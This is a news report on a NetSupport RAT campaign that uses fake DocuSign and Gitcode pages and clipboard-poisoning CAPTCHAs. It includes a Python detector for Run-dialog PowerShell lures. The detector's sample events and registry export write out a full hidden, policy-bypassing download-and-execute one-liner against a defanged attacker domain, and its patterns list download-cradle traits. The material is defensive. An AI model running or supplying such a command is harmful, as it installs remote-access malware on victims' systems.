New malware campaign exploits fake Gitcode and DocuSign sites to deliver NetSupport RAT

A sophisticated campaign is using fake websites to trick users into executing malicious PowerShell scripts, ultimately infecting their systems with the NetSupport Remote Access Trojan (RAT).

Researchers from the DomainTools Investigations (DTI) team said that the malicious scripts are hosted on fake sites impersonating popular services such as Gitcode and DocuSign. The lure sites prompt users to run a PowerShell command via the Windows Run dialog, initiating a multi-stage infection chain.

The initial script fetches a second-stage PowerShell downloader, which in turn retrieves additional payloads and installs the NetSupport RAT, the researchers explained.

Some of the fake DocuSign pages deploy a deceptive CAPTCHA verification step. When users complete the check, page script silently writes a PowerShell command to their clipboard, a technique known as clipboard poisoning. The page then instructs them to open the Run dialog and paste, so the victim launches the malware themselves without ever seeing the command.

The campaign appears to rely heavily on social engineering tactics via email and social media to draw victims to the malicious domains, such as docusign.sa[.]com. The PowerShell scripts downloaded from the sites establish persistence through a file named wbdims.exe, likely hosted on GitHub, though it was unavailable at the time of analysis.

Further stages of the attack involve fetching additional scripts and payloads from the spoofed DocuSign domain, resulting in the download and execution of jp2launcher.exe, which deploys the NetSupport RAT.
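The chain above leaves two artifacts a defender can check for: a process-creation event where PowerShell is spawned by explorer.exe (the Run dialog is part of Explorer) with a download cradle on the command line, and an entry in the user's Run-dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The following is an added detection sketch, not DomainTools' code or data: the JSON-lines events and the .reg export are constructed (the domain is the one the report names, defanged), and the pattern weights and alert threshold are assumptions rather than a published rule.

```python
"""Detection sketch for 'paste this into Run' PowerShell lures.
Added example; telemetry below is constructed, weights/threshold are assumed."""
import json
import re
from dataclasses import dataclass, field

# Traits of the one-liner a lure asks the victim to paste. A pasted lure
# normally carries several of these at once; each match adds its weight.
PATTERNS = {
    "download_cradle": (3, re.compile(
        r"(?i)(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile|Net\.WebClient)")),
    "inline_execution": (3, re.compile(r"(?i)(\biex\b|Invoke-Expression)")),
    "hidden_window": (2, re.compile(r"(?i)-w(indowstyle)?\s+h(idden)?\b")),
    "policy_bypass": (2, re.compile(r"(?i)-e(p|xecutionpolicy)?\s+bypass\b")),
    "encoded_command": (2, re.compile(r"(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}")),
    "http_url": (1, re.compile(r"(?i)\bhxxps?://|\bhttps?://")),
}
RUN_DIALOG_PARENT = "explorer.exe"  # Win+R lives in Explorer, so it is the parent
ALERT_THRESHOLD = 5                 # assumption, tune against your own baseline


@dataclass
class Verdict:
    score: int
    reasons: list = field(default_factory=list)

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def score_command(command_line: str, parent_image: str = "") -> Verdict:
    """Weigh a command line (and optionally its parent process) for lure traits."""
    v = Verdict(0)
    for name, (weight, rx) in PATTERNS.items():
        if rx.search(command_line):
            v.score += weight
            v.reasons.append(name)
    # Only boost on the parent when the command line itself already looks off;
    # explorer.exe legitimately launches plenty of PowerShell.
    if parent_image.lower().endswith(RUN_DIALOG_PARENT) and v.score > 0:
        v.score += 2
        v.reasons.append("spawned_from_run_dialog")
    return v


def scan_process_events(jsonl: str) -> list:
    """Parse JSON-lines process-creation events (Sysmon-style field names)
    and return (Image, Verdict) for each event that crosses the threshold."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        v = score_command(ev.get("CommandLine", ""), ev.get("ParentImage", ""))
        if v.alert:
            hits.append((ev.get("Image", ""), v))
    return hits


_REG_LINE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"$')


def parse_runmru(reg_export: str) -> list:
    """Run-dialog history, newest first, from a .reg export of the RunMRU key.
    Each value is a REG_SZ ending in a literal '\\1'; MRUList gives the order.
    .reg files escape backslash and quote with a backslash, so unescape first."""
    entries, order = {}, ""
    for line in reg_export.splitlines():
        m = _REG_LINE.match(line.strip())
        if not m:
            continue
        name = m.group("name")
        value = re.sub(r"\\(.)", r"\1", m.group("value"))
        if name == "MRUList":
            order = value
        else:
            entries[name] = value[:-2] if value.endswith("\\1") else value
    return [entries[k] for k in order if k in entries]


def suspicious_runmru(reg_export: str) -> list:
    """Run-dialog history entries that score like a pasted lure command."""
    return [cmd for cmd in parse_runmru(reg_export) if score_command(cmd).alert]


# Constructed telemetry: one lure launch from the Run dialog, two benign events.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"ParentImage": r"C:\Windows\explorer.exe",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr hxxps://docusign.sa[.]com/x.ps1 -UseBasicParsing)"'}),
    json.dumps({"ParentImage": r"C:\Windows\explorer.exe",
                "Image": r"C:\Windows\System32\notepad.exe",
                "CommandLine": r"notepad C:\Users\user\notes.txt"}),
    json.dumps({"ParentImage": r"C:\Program Files\Git\usr\bin\bash.exe",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": r"powershell -File .\build.ps1"}),
])

# Constructed .reg export of the user's Run-dialog history (MRUList "ba" = b newest).
SAMPLE_RUNMRU = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -c \"iex (iwr hxxps://docusign.sa[.]com/x.ps1)\"\\1"
"MRUList"="ba"
'''

if __name__ == "__main__":
    for image, verdict in scan_process_events(SAMPLE_EVENTS):
        print(f"ALERT {image} score={verdict.score} {verdict.reasons}")
    for cmd in suspicious_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU lure: {cmd}")
```

On a live host the RunMRU export comes from `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg`, and the process events from Sysmon Event ID 1 or Windows 4688 with command-line auditing enabled. The parent-process boost deliberately requires the command line to already score, since Explorer is the parent of most user-launched PowerShell.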

While it’s unclear what threat actor is behind the campaign, researchers noted similarities in infrastructure and tactics with the SocGholish (FakeUpdates) malware campaign observed in late 2024. Furthermore, NetSupport Manager, though a legitimate remote administration tool, has frequently been co-opted by threat actors including FIN7, Scarlet Goldfinch, and Storm-0408 for malicious purposes.
